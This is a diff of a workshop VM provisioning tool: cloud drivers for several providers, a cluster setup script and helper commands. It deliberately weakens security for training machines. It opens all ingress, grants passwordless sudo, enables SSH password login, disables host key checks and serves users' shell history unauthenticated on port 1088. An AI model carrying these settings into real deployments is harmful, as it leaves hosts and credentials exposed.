_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
TAG=$1
need_tag

fping < tags/$TAG/ips.txt
}

_cmd netfix "Disable GRO and run a pinger job on the VMs"
@@ -308,6 +507,34 @@ EOF
sudo systemctl start pinger"
}

_cmd tailhist "Install history viewer on port 1088"
_cmd_tailhist () {
TAG=$1
need_tag

pssh "
wget https://github.com/joewalnes/websocketd/releases/download/v0.3.0/websocketd-0.3.0_amd64.deb
sudo dpkg -i websocketd-0.3.0_amd64.deb
sudo mkdir -p /tmp/tailhist
sudo tee /root/tailhist.service <<EOF
[Unit]
Description=tailhist

[Install]
WantedBy=multi-user.target

[Service]
WorkingDirectory=/tmp/tailhist
ExecStart=/usr/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/docker/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/tailhist.service
sudo systemctl start tailhist"
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
}
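Once tailhist is running, every node serves a live view of the docker user's shell history on port 1088 (a sketch; $IP is any address from the tag's ips.txt):

curl -s http://$IP:1088/ | head
# or simply open http://$IP:1088/ in a browser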

_cmd opensg "Open the default security group to ALL ingress traffic"
_cmd_opensg() {
need_infra $1
@@ -338,22 +565,45 @@ _cmd_pull_images() {
pull_tag
}

_cmd remap_nodeports "Remap NodePort range to 10000-10999"
_cmd_remap_nodeports() {
TAG=$1
need_tag

FIND_LINE=" - --service-cluster-ip-range=10.96.0.0\/12"
ADD_LINE=" - --service-node-port-range=10000-10999"
MANIFEST_FILE=/etc/kubernetes/manifests/kube-apiserver.yaml
pssh "
if i_am_first_node && ! grep -q '$ADD_LINE' $MANIFEST_FILE; then
sudo sed -i 's/\($FIND_LINE\)\$/\1\n$ADD_LINE/' $MANIFEST_FILE
fi"

info "If you have manifests hard-coding nodePort values,"
info "you might want to patch them with a command like:"
info "

if i_am_first_node; then
kubectl -n kube-system patch svc prometheus-server \\
-p 'spec: { ports: [ {port: 80, nodePort: 10101} ]}'
fi

"
}

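For reference, the sed above turns the relevant section of the API server manifest into this (second line is the one inserted):

# - --service-cluster-ip-range=10.96.0.0/12
# - --service-node-port-range=10000-10999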
_cmd quotas "Check our infrastructure quotas (max instances)"
_cmd_quotas() {
need_infra $1
infra_quotas
}

-_cmd retag "(FIXME) Apply a new tag to a group of VMs"
-_cmd_retag() {
-OLDTAG=$1
-NEWTAG=$2
-TAG=$OLDTAG
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
-if [[ -z "$NEWTAG" ]]; then
-die "You must specify a new tag to apply."
-fi
-aws_tag_instances $OLDTAG $NEWTAG
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh $SSHOPTS docker@$IP

}

_cmd start "Start a group of VMs"
@@ -362,12 +612,13 @@ _cmd_start() {
case "$1" in
--infra) INFRA=$2; shift 2;;
--settings) SETTINGS=$2; shift 2;;
---count) COUNT=$2; shift 2;;
+--count) die "Flag --count is deprecated; please use --students instead." ;;
--tag) TAG=$2; shift 2;;
--students) STUDENTS=$2; shift 2;;
*) die "Unrecognized parameter: $1."
esac
done

if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
@@ -375,16 +626,22 @@ _cmd_start() {
die "Please add --settings flag to specify which settings file to use."
fi
if [ -z "$COUNT" ]; then
-COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
-warning "No --count option was specified. Using value from settings file ($COUNT)."
+CLUSTERSIZE=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
+if [ -z "$STUDENTS" ]; then
+warning "Neither --count nor --students was specified."
+warning "According to the settings file, the cluster size is $CLUSTERSIZE."
+warning "Deploying one cluster of $CLUSTERSIZE nodes."
+STUDENTS=1
+fi
+COUNT=$(($STUDENTS*$CLUSTERSIZE))
fi

# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA

if [ -z "$TAG" ]; then
-TAG=$(make_tag)
+TAG=$(_cmd_maketag)
fi
mkdir -p tags/$TAG
ln -s ../../$INFRA tags/$TAG/infra.sh
@@ -394,11 +651,43 @@ _cmd_start() {
infra_start $COUNT
sep
info "Successfully created $COUNT instances with tag $TAG"
sep
echo created > tags/$TAG/status

-info "To deploy Docker on these instances, you can run:"
-info "$0 deploy $TAG"
# If the settings.yaml file has a "steps" field,
# automatically execute all the actions listed in that field.
# If an action fails, retry it up to 10 times.
python -c 'if True: # hack to deal with indentation
import sys, yaml
settings = yaml.safe_load(sys.stdin)
print ("\n".join(settings.get("steps", [])))
' < tags/$TAG/settings.yaml \
| while read step; do
if [ -z "$step" ]; then
break
fi
sep
info "Automatically executing step '$step'."
TRY=1
MAXTRY=10
while ! $0 $step $TAG ; do
TRY=$(($TRY+1))
if [ $TRY -gt $MAXTRY ]; then
error "This step ($step) failed after $MAXTRY attempts."
info "You can troubleshoot the situation manually, or terminate these instances with:"
info "$0 stop $TAG"
die "Giving up."
else
sep
info "Step '$step' failed. Let's wait 10 seconds and try again."
info "(Attempt $TRY out of $MAXTRY.)"
sleep 10
fi
done
done
sep
info "Deployment successful."
info "To log into the first machine of that batch, you can run:"
info "$0 ssh $TAG"
info "To terminate these instances, you can run:"
info "$0 stop $TAG"
}
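A settings file driving this automatic pipeline could look like the sketch below (the steps field name comes from the Python snippet above; the step values are assumed to match _cmd entries defined in this script):

clustersize: 3
steps:
- deploy
- kube
- kubetools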
@@ -446,21 +735,25 @@ _cmd_test() {
test_tag
}

-_cmd helmprom "Install Helm and Prometheus"
_cmd tmux "Log into the first node and start a tmux server"
_cmd_tmux() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Opening ssh+tmux with $IP"
rm -f /tmp/tmux-$UID/default
ssh $SSHOPTS -t -L /tmp/tmux-$UID/default:/tmp/tmux-1001/default docker@$IP tmux new-session -As 0
}

_cmd helmprom "Install Prometheus with Helm"
_cmd_helmprom() {
TAG=$1
need_tag
pssh "
-if grep -q node1 /tmp/node; then
-kubectl -n kube-system get serviceaccount helm ||
-kubectl -n kube-system create serviceaccount helm
-helm init --service-account helm
-kubectl get clusterrolebinding helm-can-do-everything ||
-kubectl create clusterrolebinding helm-can-do-everything \
---clusterrole=cluster-admin \
---serviceaccount=kube-system:helm
-helm upgrade --install prometheus stable/prometheus \
---namespace kube-system \
if i_am_first_node; then
sudo -u docker -H helm upgrade --install prometheus prometheus \
--repo https://prometheus-community.github.io/helm-charts/ \
--namespace prometheus --create-namespace \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
--set server.persistentVolume.enabled=false \
@@ -468,6 +761,31 @@ _cmd_helmprom() {
fi"
}

_cmd passwords "Set individual passwords for each cluster"
_cmd_passwords() {
TAG=$1
need_tag
PASSWORDS_FILE="tags/$TAG/passwords"
if ! [ -f "$PASSWORDS_FILE" ]; then
error "File $PASSWORDS_FILE not found. Please create it first."
error "It should contain one password per line."
error "It should have as many lines as there are clusters."
die "Aborting."
fi
N_CLUSTERS=$($0 ips "$TAG" | wc -l)
N_PASSWORDS=$(wc -l < "$PASSWORDS_FILE")
if [ "$N_CLUSTERS" != "$N_PASSWORDS" ]; then
die "Found $N_CLUSTERS clusters and $N_PASSWORDS passwords. Aborting."
fi
$0 ips "$TAG" | paste "$PASSWORDS_FILE" - | while read password nodes; do
info "Setting password for $nodes..."
for node in $nodes; do
echo docker:$password | ssh $SSHOPTS ubuntu@$node sudo chpasswd
done
done
info "Done."
}
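Sketch of the expected passwords file and invocation (password values illustrative; one line per cluster, matching the line count of the ips output above):

cat > tags/$TAG/passwords <<EOF
correct-horse
battery-staple
EOF
./workshopctl passwords $TAG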

# Sometimes, weave fails to come up on some nodes.
# Symptom: the pods on a node are unreachable (they don't even ping).
# Remedy: wipe out Weave state and delete weave pod on that node.
@@ -484,9 +802,49 @@ _cmd_weavetest() {
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}

-greet() {
-IAMUSER=$(aws iam get-user --query 'User.UserName')
-info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
_cmd webssh "Install a web SSH server on the machines (port 1080)"
_cmd_webssh() {
TAG=$1
need_tag
pssh "
sudo apt-get update &&
sudo apt-get install python-tornado python-paramiko -y"
pssh "
cd /opt
[ -d webssh ] || sudo git clone https://github.com/jpetazzo/webssh"
pssh "
for KEYFILE in /etc/ssh/*.pub; do
read a b c < \$KEYFILE; echo localhost \$a \$b
done | sudo tee /opt/webssh/known_hosts"
pssh "cat >webssh.service <<EOF
[Unit]
Description=webssh

[Install]
WantedBy=multi-user.target

[Service]
WorkingDirectory=/opt/webssh
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
EOF"
pssh "
sudo systemctl enable \$PWD/webssh.service &&
sudo systemctl start webssh.service"
}

_cmd www "Run a web server to access card HTML and PDF"
_cmd_www() {
cd www
IPADDR=$(curl -sL canihazip.com/s)
info "The following files are available:"
for F in *; do
echo "http://$IPADDR:8000/$F"
done
info "Press Ctrl-C to stop server."
python3 -m http.server
}

pull_tag() {
@@ -541,8 +899,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
-"cat /tmp/node" \
-"cat /tmp/ipv4" \
+"ls -l /usr/local/bin/i_am_first_node" \
+"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \
@@ -556,10 +914,7 @@ test_vm() {
"ls -la /home/docker/.ssh"; do
sep "$cmd"
echo "$cmd" \
-| ssh -A -q \
--o "UserKnownHostsFile /dev/null" \
--o "StrictHostKeyChecking=no" \
-$user@$ip sudo -u docker -i \
+| ssh -A $SSHOPTS $user@$ip sudo -u docker -i \
|| {
status=$?
error "$cmd exit status: $status"
@@ -578,34 +933,3 @@ make_key_name() {
SHORT_FINGERPRINT=$(ssh-add -l | grep RSA | head -n1 | cut -d " " -f 2 | tr -d : | cut -c 1-8)
echo "${SHORT_FINGERPRINT}-${USER}"
}
-
-sync_keys() {
-# make sure ssh-add -l contains "RSA"
-ssh-add -l | grep -q RSA \
-|| die "The output of \`ssh-add -l\` doesn't contain 'RSA'. Start the agent, add your keys?"
-
-AWS_KEY_NAME=$(make_key_name)
-info "Syncing keys... "
-if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
-aws ec2 import-key-pair --key-name $AWS_KEY_NAME \
---public-key-material "$(ssh-add -L \
-| grep -i RSA \
-| head -n1 \
-| cut -d " " -f 1-2)" &>/dev/null
-
-if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
-die "Somehow, importing the key didn't work. Make sure that 'ssh-add -l | grep RSA | head -n1' returns an RSA key?"
-else
-info "Imported new key $AWS_KEY_NAME."
-fi
-else
-info "Using existing key $AWS_KEY_NAME."
-fi
-}
-
-make_tag() {
-if [ -z $USER ]; then
-export USER=anonymous
-fi
-date +%Y-%m-%d-%H-%M-$USER
-}

@@ -1,9 +1,14 @@
if ! command -v aws >/dev/null; then
warning "AWS CLI (aws) not found."
fi

infra_list() {
-aws_display_tags
aws ec2 describe-instances --output json |
jq -r '.Reservations[].Instances[] | [.InstanceId, .ClientToken, .State.Name, .InstanceType ] | @tsv'
}

infra_quotas() {
-greet
+aws_greet

max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
@@ -21,16 +26,17 @@ infra_start() {
COUNT=$1

# Print our AWS username, to ease the pain of credential-juggling
-greet
+aws_greet

# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
-key_name=$(sync_keys)
+key_name=$(aws_sync_keys)

AMI=$(aws_get_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
AWS_KEY_NAME=$(make_key_name)
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

sep "Starting instances"
info " Count: $COUNT"
@@ -38,10 +44,11 @@ infra_start() {
info " Token/tag: $TAG"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
info " Instance type: $AWS_INSTANCE_TYPE"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
---instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
+--instance-type $AWS_INSTANCE_TYPE \
--client-token $TAG \
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
--image-id $AMI)
@@ -59,7 +66,7 @@ infra_start() {
aws_tag_instances $TAG $TAG

# Wait until EC2 API tells us that the instances are running
-wait_until_tag_is_running $TAG $COUNT
+aws_wait_until_tag_is_running $TAG $COUNT

aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}
@@ -96,8 +103,8 @@ infra_disableaddrchecks() {
done
}

-wait_until_tag_is_running() {
-max_retry=50
+aws_wait_until_tag_is_running() {
+max_retry=100
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
@@ -210,5 +217,34 @@ aws_tag_instances() {

aws_get_ami() {
##VERSION##
-find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
+find_ubuntu_ami -r $AWS_DEFAULT_REGION -a ${AWS_ARCHITECTURE-amd64} -v 18.04 -t hvm:ebs -N -q
}

aws_greet() {
IAMUSER=$(aws iam get-user --query 'User.UserName')
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
}

aws_sync_keys() {
# make sure ssh-add -l contains "RSA"
ssh-add -l | grep -q RSA \
|| die "The output of \`ssh-add -l\` doesn't contain 'RSA'. Start the agent, add your keys?"

AWS_KEY_NAME=$(make_key_name)
info "Syncing keys... "
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
aws ec2 import-key-pair --key-name $AWS_KEY_NAME \
--public-key-material "$(ssh-add -L \
| grep -i RSA \
| head -n1 \
| cut -d " " -f 1-2)" &>/dev/null

if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
die "Somehow, importing the key didn't work. Make sure that 'ssh-add -l | grep RSA | head -n1' returns an RSA key?"
else
info "Imported new key $AWS_KEY_NAME."
fi
else
info "Using existing key $AWS_KEY_NAME."
fi
}

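The new AWS_ARCHITECTURE and AWS_INSTANCE_TYPE overrides make ARM runs possible (a sketch; assumes find_ubuntu_ami accepts arm64 and that the instance type matches the architecture; file paths illustrative):

AWS_ARCHITECTURE=arm64 AWS_INSTANCE_TYPE=t4g.medium \
./workshopctl start --infra infra/aws --settings settings/kube.yaml --students 10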
prepare-vms/lib/infra/hetzner.sh (new file, 57 lines)
@@ -0,0 +1,57 @@
if ! command -v hcloud >/dev/null; then
warning "Hetzner CLI (hcloud) not found."
fi
if ! [ -f ~/.config/hcloud/cli.toml ]; then
warning "~/.config/hcloud/cli.toml not found."
fi

infra_list() {
[ "$(hcloud server list -o json)" = "null" ] && return

hcloud server list -o json |
jq -r '.[] | [.id, .name , .status, .server_type.name] | @tsv'
}

infra_start() {
COUNT=$1

HETZNER_INSTANCE_TYPE=${HETZNER_INSTANCE_TYPE-cx21}
HETZNER_DATACENTER=${HETZNER_DATACENTER-nbg1-dc3}
HETZNER_IMAGE=${HETZNER_IMAGE-168855}

for I in $(seq 1 $COUNT); do
NAME=$(printf "%s-%03d" $TAG $I)
sep "Starting instance $I/$COUNT"
info " Datacenter: $HETZNER_DATACENTER"
info " Name: $NAME"
info " Instance type: $HETZNER_INSTANCE_TYPE"
hcloud server create \
--type=${HETZNER_INSTANCE_TYPE} \
--datacenter=${HETZNER_DATACENTER} \
--image=${HETZNER_IMAGE} \
--name=$NAME \
--label=tag=$TAG \
--ssh-key ~/.ssh/id_rsa.pub
done

hetzner_get_ips_by_tag $TAG > tags/$TAG/ips.txt
}

infra_stop() {
for ID in $(hetzner_get_ids_by_tag $TAG); do
info "Scheduling deletion of instance $ID..."
hcloud server delete $ID &
done
info "Waiting for deletion to complete..."
wait
}

hetzner_get_ids_by_tag() {
TAG=$1
hcloud server list --selector=tag=$TAG -o json | jq -r .[].name
}

hetzner_get_ips_by_tag() {
TAG=$1
hcloud server list --selector=tag=$TAG -o json | jq -r .[].public_net.ipv4.ip
}
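All the Hetzner knobs are overridable from the environment (defaults shown above; values and file paths illustrative):

HETZNER_INSTANCE_TYPE=cx31 HETZNER_DATACENTER=fsn1-dc14 \
./workshopctl start --infra infra/hetzner --settings settings/kube.yaml --students 5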
prepare-vms/lib/infra/linode.sh (new file, 58 lines)
@@ -0,0 +1,58 @@
if ! command -v linode-cli >/dev/null; then
warning "Linode CLI (linode-cli) not found."
fi
if ! [ -f ~/.config/linode-cli ]; then
warning "~/.config/linode-cli not found."
fi

# To view available regions: "linode-cli regions list"
LINODE_REGION=${LINODE_REGION-us-west}

# To view available types: "linode-cli linodes types"
LINODE_TYPE=${LINODE_TYPE-g6-standard-2}

infra_list() {
linode-cli linodes list --json |
jq -r '.[] | [.id, .label, .status, .type] | @tsv'
}

infra_start() {
COUNT=$1

for I in $(seq 1 $COUNT); do
NAME=$(printf "%s-%03d" $TAG $I)
sep "Starting instance $I/$COUNT"
info " Zone: $LINODE_REGION"
info " Name: $NAME"
info " Instance type: $LINODE_TYPE"
ROOT_PASS="$(base64 /dev/urandom | cut -c1-20 | head -n 1)"
linode-cli linodes create \
--type=${LINODE_TYPE} --region=${LINODE_REGION} \
--image=linode/ubuntu18.04 \
--authorized_keys="${LINODE_SSHKEY}" \
--root_pass="${ROOT_PASS}" \
--tags=${TAG} --label=${NAME}
done
sep

linode_get_ips_by_tag $TAG > tags/$TAG/ips.txt
}

infra_stop() {
info "Counting instances..."
linode_get_ids_by_tag $TAG | wc -l
info "Deleting instances..."
linode_get_ids_by_tag $TAG |
xargs -n1 -P10 \
linode-cli linodes delete
}

linode_get_ids_by_tag() {
TAG=$1
linode-cli linodes list --tags $TAG --json | jq -r ".[].id"
}

linode_get_ips_by_tag() {
TAG=$1
linode-cli linodes list --tags $TAG --json | jq -r ".[].ipv4[0]"
}
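Note that LINODE_SSHKEY is consumed above but never given a default, so it must be exported beforehand (a sketch; file paths illustrative):

export LINODE_SSHKEY="$(cat ~/.ssh/id_rsa.pub)"
LINODE_REGION=eu-central ./workshopctl start --infra infra/linode --settings settings/kube.yaml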
prepare-vms/lib/infra/openstack-cli.sh (new file, 53 lines)
@@ -0,0 +1,53 @@
infra_list() {
openstack server list -f json |
jq -r '.[] | [.ID, .Name , .Status, .Flavor] | @tsv'
}

infra_start() {
COUNT=$1

sep "Starting $COUNT instances"
info " Region: $OS_REGION_NAME"
info " User: $OS_USERNAME"
info " Flavor: $OS_FLAVOR"
info " Image: $OS_IMAGE"
openstack server create \
--flavor $OS_FLAVOR \
--image $OS_IMAGE \
--key-name $OS_KEY \
--min $COUNT --max $COUNT \
--property workshopctl=$TAG \
$TAG

sep "Waiting for IP addresses to be available"
GOT=0
while [ "$GOT" != "$COUNT" ]; do
echo "Got $GOT/$COUNT IP addresses."
oscli_get_ips_by_tag $TAG > tags/$TAG/ips.txt
GOT="$(wc -l < tags/$TAG/ips.txt)"
done

}

infra_stop() {
info "Counting instances..."
oscli_get_instances_json $TAG |
jq -r .[].Name |
wc -l
info "Deleting instances..."
oscli_get_instances_json $TAG |
jq -r .[].Name |
xargs -P10 -n1 openstack server delete
info "Done."
}

oscli_get_instances_json() {
TAG=$1
openstack server list -f json --name "${TAG}-[0-9]*"
}

oscli_get_ips_by_tag() {
TAG=$1
oscli_get_instances_json $TAG |
jq -r .[].Networks | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' || true
}
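This driver relies on the usual OpenStack environment (an openrc file providing OS_REGION_NAME, OS_USERNAME, credentials, and so on) plus three custom variables used above (a sketch; flavor, image, and key names illustrative):

export OS_FLAVOR=b2-7 OS_IMAGE="Ubuntu 18.04" OS_KEY=mykey
./workshopctl start --infra infra/openstack-cli --settings settings/kube.yaml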
prepare-vms/lib/infra/openstack-tf.sh (new file, 28 lines)
@@ -0,0 +1,28 @@
infra_start() {
COUNT=$1

cp terraform/*.tf tags/$TAG
(
cd tags/$TAG
if ! terraform init; then
error "'terraform init' failed."
error "If it mentions the following error message:"
error "openpgp: signature made by unknown entity."
error "Then you need to upgrade Terraform to 0.11.15,"
error "which updated its signing keys after the"
error "Codecov breach."
die "Aborting."
fi
echo prefix = \"$TAG\" >> terraform.tfvars
echo count = \"$COUNT\" >> terraform.tfvars
terraform apply -auto-approve
terraform output ip_addresses > ips.txt
)
}

infra_stop() {
(
cd tags/$TAG
terraform destroy -auto-approve
)
}
@@ -1,20 +0,0 @@
-infra_start() {
-COUNT=$1
-
-cp terraform/*.tf tags/$TAG
-(
-cd tags/$TAG
-terraform init
-echo prefix = \"$TAG\" >> terraform.tfvars
-echo count = \"$COUNT\" >> terraform.tfvars
-terraform apply -auto-approve
-terraform output ip_addresses > ips.txt
-)
-}
-
-infra_stop() {
-(
-cd tags/$TAG
-terraform destroy -auto-approve
-)
-}
prepare-vms/lib/infra/scaleway.sh (new file, 51 lines)
@@ -0,0 +1,51 @@
if ! command -v scw >/dev/null; then
warning "Scaleway CLI (scw) not found."
fi
if ! [ -f ~/.config/scw/config.yaml ]; then
warning "~/.config/scw/config.yaml not found."
fi

SCW_INSTANCE_TYPE=${SCW_INSTANCE_TYPE-DEV1-M}
SCW_ZONE=${SCW_ZONE-fr-par-1}

infra_list() {
scw instance server list -o json |
jq -r '.[] | [.id, .name, .state, .commercial_type] | @tsv'
}

infra_start() {
COUNT=$1

for I in $(seq 1 $COUNT); do
NAME=$(printf "%s-%03d" $TAG $I)
sep "Starting instance $I/$COUNT"
info " Zone: $SCW_ZONE"
info " Name: $NAME"
info " Instance type: $SCW_INSTANCE_TYPE"
scw instance server create \
type=${SCW_INSTANCE_TYPE} zone=${SCW_ZONE} \
image=ubuntu_bionic name=${NAME}
done
sep

scw_get_ips_by_tag $TAG > tags/$TAG/ips.txt
}

infra_stop() {
info "Counting instances..."
scw_get_ids_by_tag $TAG | wc -l
info "Deleting instances..."
scw_get_ids_by_tag $TAG |
xargs -n1 -P10 \
scw instance server delete zone=${SCW_ZONE} force-shutdown=true with-ip=true
}

scw_get_ids_by_tag() {
TAG=$1
scw instance server list zone=${SCW_ZONE} name=$TAG -o json | jq -r .[].id
}

scw_get_ips_by_tag() {
TAG=$1
scw instance server list zone=${SCW_ZONE} name=$TAG -o json | jq -r .[].public_ip.address
}
prepare-vms/lib/infra/unimplemented.sh (new file, 23 lines)
@@ -0,0 +1,23 @@
infra_disableaddrchecks() {
die "unimplemented"
}

infra_list() {
die "unimplemented"
}

infra_opensg() {
die "unimplemented"
}

infra_quotas() {
die "unimplemented"
}

infra_start() {
die "unimplemented"
}

infra_stop() {
die "unimplemented"
}
@@ -1,20 +1,15 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
import os
import sys
import yaml
import jinja2

def prettify(l):
l = [ip.strip() for ip in l]
ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
return ret

# Read settings from user-provided settings file
-SETTINGS = yaml.load(open(sys.argv[1]))
-
-clustersize = SETTINGS["clustersize"]
+context = yaml.safe_load(open(sys.argv[1]))

ips = list(open("ips.txt"))
+clustersize = context["clustersize"]

print("---------------------------------------------")
print(" Number of IPs: {}".format(len(ips)))
@@ -30,7 +25,9 @@ while ips:
ips = ips[clustersize:]
clusters.append(cluster)

-template_file_name = SETTINGS["cards_template"]
+context["clusters"] = clusters
+
+template_file_name = context["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
"..",
@@ -39,18 +36,21 @@ template_file_path = os.path.join(
)
template = jinja2.Template(open(template_file_path).read())
with open("ips.html", "w") as f:
-f.write(template.render(clusters=clusters, **SETTINGS))
+f.write(template.render(**context))
print("Generated ips.html")


try:
import pdfkit
paper_size = context["paper_size"]
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
with open("ips.html") as f:
pdfkit.from_file(f, "ips.pdf", options={
-"page-size": SETTINGS["paper_size"],
-"margin-top": SETTINGS["paper_margin"],
-"margin-bottom": SETTINGS["paper_margin"],
-"margin-left": SETTINGS["paper_margin"],
-"margin-right": SETTINGS["paper_margin"],
+"page-size": paper_size,
+"margin-top": margin,
+"margin-bottom": margin,
+"margin-left": margin,
+"margin-right": margin,
})
print("Generated ips.pdf")
except ImportError:

@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]

@@ -36,7 +37,7 @@ def system(cmd):
td = str(t2-t1)[:5]
f.write(bold("[{}] in {}s\n".format(retcode, td)))
STEP += 1
-with open("/home/ubuntu/.bash_history", "a") as f:
+with open(os.environ["HOME"] + "/.bash_history", "a") as f:
f.write("{}\n".format(cmd))
if retcode != 0:
msg = "The following command failed with exit code {}:\n".format(retcode)
@@ -64,6 +65,15 @@ system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
SQRL""".format(ipv4))

# Bigger history, in a different file, and saved before executing each command
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export HISTSIZE=9999
export HISTFILESIZE=9999
shopt -s histappend
trap 'history -a' DEBUG
export HISTFILE=~/.history
SQRL""")

# Custom .vimrc
system("""sudo -u docker tee /home/docker/.vimrc <<SQRL
syntax on
@@ -72,8 +82,29 @@ set expandtab
set number
set shiftwidth=2
set softtabstop=2
set nowrap
SQRL""")

# Custom .tmux.conf
system(
"""sudo -u docker tee /home/docker/.tmux.conf <<SQRL
bind h select-pane -L
bind j select-pane -D
bind k select-pane -U
bind l select-pane -R

# Allow using mouse to switch panes
set -g mouse on

# Make scrolling with wheels work

bind -n WheelUpPane if-shell -F -t = "#{mouse_any_flag}" "send-keys -M" "if -Ft= '#{pane_in_mode}' 'send-keys -M' 'select-pane -t=; copy-mode -e; send-keys -M'"
bind -n WheelDownPane select-pane -t= \; send-keys -M

SQRL"""
)


# add docker user to sudoers and allow password authentication
system("""sudo tee /etc/sudoers.d/docker <<SQRL
docker ALL=(ALL) NOPASSWD:ALL
@@ -83,7 +114,8 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e

system("sudo service ssh restart")
system("sudo apt-get -q update")
-system("sudo apt-get -qy install git jq")
+system("sudo apt-get -qy install git jid jq")
+system("sudo apt-get -qy install emacs-nox joe")

#######################
### DOCKER INSTALLS ###
@@ -121,7 +153,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses

def makenames(addrs):
-return [ "node%s"%(i+1) for i in range(len(addrs)) ]
+return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]

while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -135,15 +167,21 @@ while addresses:
print(cluster)

mynode = cluster.index(ipv4) + 1
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
-system("echo node{} | sudo tee /etc/hostname".format(mynode))
-system("sudo hostname node{}".format(mynode))
+system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
+system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")

# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
-# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPv4 address and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))

FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

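The i_am_first_node symlink gives every later script a cheap, argument-free test: it points at /bin/true on the first node and /bin/false everywhere else, which is exactly what the workshopctl commands above rely on:

if i_am_first_node; then echo "I am the first node"; else echo "I am a follower"; fi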
@@ -18,7 +18,13 @@ pssh() {
echo "[parallel-ssh] $@"
export PSSH=$(which pssh || which parallel-ssh)

-$PSSH -h $HOSTFILE -l ubuntu \
case "$INFRACLASS" in
hetzner) LOGIN=root ;;
linode) LOGIN=root ;;
*) LOGIN=ubuntu ;;
esac

$PSSH -h $HOSTFILE -l $LOGIN \
--par 100 \
-O LogLevel=ERROR \
-O UserKnownHostsFile=/dev/null \

prepare-vms/lib/tailhist.html (new file, 42 lines)
@@ -0,0 +1,42 @@
<!DOCTYPE html>
<html>
<head>
<title>bash history</title>
<style>
#log {
font: bold 24px courier;
}

#log div:last-child {
background: yellow;
}
</style>
</head>
<body>

<div id="log"></div>

<script>
var ws = new WebSocket('ws://' + (location.host ? location.host : "localhost:8080") + "/");
var log = document.getElementById('log');
var echo = function(text) {
var line = document.createElement('div');
line.textContent = text;
log.appendChild(line);
line.scrollIntoView();
}
ws.onopen = function() {
document.body.style.backgroundColor = '#cfc';
};
ws.onclose = function() {
document.body.style.backgroundColor = '#fcc';
